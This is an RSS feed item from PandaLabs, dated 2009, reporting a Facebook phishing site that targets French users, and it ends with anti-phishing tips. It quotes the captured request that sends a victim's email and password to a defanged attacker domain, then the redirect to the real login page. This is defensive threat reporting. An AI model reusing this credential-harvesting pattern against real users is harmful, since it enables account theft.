<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://pandalabs.pandasecurity.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>PandaLabs : Phishing</title><link>http://pandalabs.pandasecurity.com/archive/tags/Phishing/default.aspx</link><description>Tags: Phishing</description><dc:language>en</dc:language><generator>CommunityServer 2.1 SP2 (Build: 61120.2)</generator><item><title>Facebook Phishing Site Targets French Users</title><link>http://pandalabs.pandasecurity.com/archive/Facebook-Phishing-Site-Targets-French-Users.aspx</link><pubDate>Thu, 05 Feb 2009 11:18:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:960</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/960.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=960</wfw:commentRss><description>&lt;p&gt;Today I discovered a new Facebook phishing site targeting French users.&amp;nbsp; The login page looks identical to the official &lt;a href="http://www.facebook.com/" title="Facebook Login"&gt;Facebook&lt;/a&gt; site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site. &lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;a href="http://support.us.pandasecurity.com/blog/fakebook.png"&gt;&lt;img alt="Fake Facebook Login Page" border="0" height="490" src="http://support.us.pandasecurity.com/blog/fakebook.png" title="Fake Facebook Login Page" width="679" /&gt;&lt;/a&gt;&lt;/p&gt;
 
&lt;p&gt;&lt;strong&gt;Source: &lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="source code to phishing page" border="0" height="204" src="http://support.us.pandasecurity.com/blog/source.png" title="source code to phishing page" width="669" /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Connection:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;(Passing the victims credentials over to the attacker)&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;sub&gt;&lt;strong&gt;GET&lt;/strong&gt; hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&amp;amp;locale=fr_FR&amp;amp;email=&lt;strong&gt;victim@domain.com&lt;/strong&gt;&amp;amp;pass=&lt;strong&gt;victimpass&lt;/strong&gt;&amp;amp;pass_placeholder=Mot+de+passe&amp;amp;charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;(Redirecting to the official Facebook login page)&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;strong&gt;302&lt;/strong&gt; Moved Temporarily to https://login.facebook.com/login.php &lt;strong&gt;&lt;/strong&gt;&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.&amp;nbsp; The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;strong&gt;Tips to Avoid Phishing Attacks on Facebook [&lt;a href="http://blog.facebook.com/blog.php?post=14600297130" title="Tips to Avoid Phishing"&gt;Facebook Blog&lt;/a&gt;]&lt;br /&gt;
&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Remember, Facebook will never ask for your password&lt;/strong&gt; in
an email, Facebook message, or any medium that isn&amp;#39;t the login page.
Though you will need to re-enter your password when you set a security
question, change your contact email, or send a virtual gift.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of weird Wall posts.&lt;/strong&gt;  Don&amp;#39;t click on any links&amp;mdash;on a Wall or elsewhere&amp;mdash;if you don&amp;#39;t know where they go.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Set a security question&lt;/strong&gt; for yourself on your &lt;a href="https://register.facebook.com/editaccount.php" title="https://register.facebook.com/editaccount.php" target="_blank"&gt;Account&lt;/a&gt;
page. If somehow something malicious shuts you out of your account, you
will need the answer to that question in order for our User Operations
team to let you back in. (If you&amp;#39;ve already set your security question,
you won&amp;#39;t see a prompt for it on your Account page.)&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of what website you are using to log in to Facebook&lt;/strong&gt;&lt;span&gt;
(and other websites). Phishing websites can be made to look like other
websites (like the Facebook log in page), and might try to disguise
their urls. Be smart: www.facebook.com.profile.a&lt;/span&gt;&lt;span class="word_break"&gt;&lt;/span&gt;36h8su2m8.info/login
starts out looking like a legitimate Facebook website, but that
a36h8su2m8.info part means it&amp;#39;s fraudulent. Set and use a browser
bookmark to make sure you always log in from facebook.com&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;If you see a Wall post that looks like spam&lt;/strong&gt; on a friend&amp;#39;s Wall, tell the author to delete it and reset their password immediately.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Use a modern web browser&lt;/strong&gt; to benefit from anti-phishing protection
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx" title="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx        " target="_blank"&gt;Internet Explorer 7&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href="http://www.mozilla.com/en-US/firefox/phishing-protection/" title="http://www.mozilla.com/en-US/firefox/phishing-protection/" target="_blank"&gt;Firefox&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Check out &lt;a href="http://www.opendns.com/" title="http://www.opendns.com" target="_blank"&gt;opendns.com&lt;/a&gt;&lt;/strong&gt;. This is another method for blocking specific domains that host phishing sites.&lt;/li&gt;
&lt;/ul&gt;
Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.&amp;nbsp;&amp;nbsp; &lt;br /&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=960" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Phishing/default.aspx">Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Anti-Phishing/default.aspx">Anti-Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Tips/default.aspx">Tips</category></item></channel></rss>